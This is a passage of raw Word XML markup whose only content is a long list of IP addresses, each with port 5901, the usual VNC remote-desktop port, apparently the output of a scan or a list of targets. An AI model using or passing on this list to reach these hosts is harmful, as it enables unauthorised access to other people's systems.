    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.42.176.8:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.42.176.4:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.42.176.7:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.42.176.10:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.41.2.5:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.41.2.6:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">175.41.7.8:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">180.97.150.247:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.41.13.20:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.41.7.7:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.41.15.7:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.41.15.8:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.41.0.73:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">180.153.150.154:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">180.153.147.3:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">180.153.147.88:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">180.168.34.246:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">182.23.50.124:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">182.87.64.182:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">182.86.200.217:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">182.140.241.196:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">182.148.58.129:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">182.148.59.57:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">182.151.214.251:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">183.37.222.239:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">183.56.129.115:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">183.56.129.117:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">183.56.129.116:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">183.56.129.114:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">183.39.65.238:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">183.57.43.8:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">183.57.151.116:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">183.60.175.44:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">183.61.117.138:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">183.63.76.93:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">183.63.252.162:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">183.148.70.46:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">183.148.84.61:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">193.136.139.2:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">193.136.199.67:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">199.182.161.130:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">199.182.161.131:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">199.182.161.132:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.0.36.65:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">201.34.105.164:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.9.98.141:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.9.98.143:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.39.237.4:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.27.219.153:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">202.43.35.208:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.43.35.209:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.46.74.10:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.45.116.103:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.55.81.98:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.55.81.99:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.70.70.45:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.44.37.130:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.43.183.236:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.73.10.211:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.73.10.212:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.74.201.14:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.75.248.194:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.78.81.204:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.78.159.233:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.83.21.135:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.83.21.134:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.83.21.133:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.79.202.171:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.91.229.145:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.91.136.207:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.90.62.115:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">202.90.62.149:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.90.62.115:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.98.225.252:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.98.152.167:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.98.225.253:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.99.222.86:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.99.222.85:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.100.91.133:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.100.91.132:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.100.228.135:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.100.228.133:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.100.228.134:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.102.86.61:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.102.241.221:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.103.218.151:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.103.218.149:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.103.218.150:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.103.243.119:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.104.110.134:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.104.110.132:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.104.110.131:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.118.75.154:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">202.118.74.27:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.120.115.33:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.125.157.70:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.130.85.94:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.134.49.19:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.143.151.243:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.137.26.11:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.134.152.116:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.146.7.132:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.149.85.230:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.147.227.77:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.153.229.198:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.153.228.82:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.153.113.57:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.153.39.52:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.170.57.89:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.171.20.117:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.165.183.221:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.164.38.90:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.175.69.235:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.182.63.90:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.182.63.83:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">202.182.63.91:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.182.63.79:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.153.229.228:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.69.250.101:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.74.114.162:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.74.114.159:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.75.44.39:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.75.44.38:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.82.212.89:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.93.0.18:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.90.246.164:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.90.246.162:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.115.116.196:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.90.246.163:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.144.227.236:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.160.81.56:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.152.207.37:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.161.85.175:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.144.24.134:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.174.55.162:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.195.153.84:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">203.198.130.167:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.190.248.131:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.196.178.69:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.215.183.120:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.13.93.37:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.195.220.67:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.51.165.40:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.51.165.41:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.77.77.72:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.193.13.33:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.200.216.196:5901 </w:t>
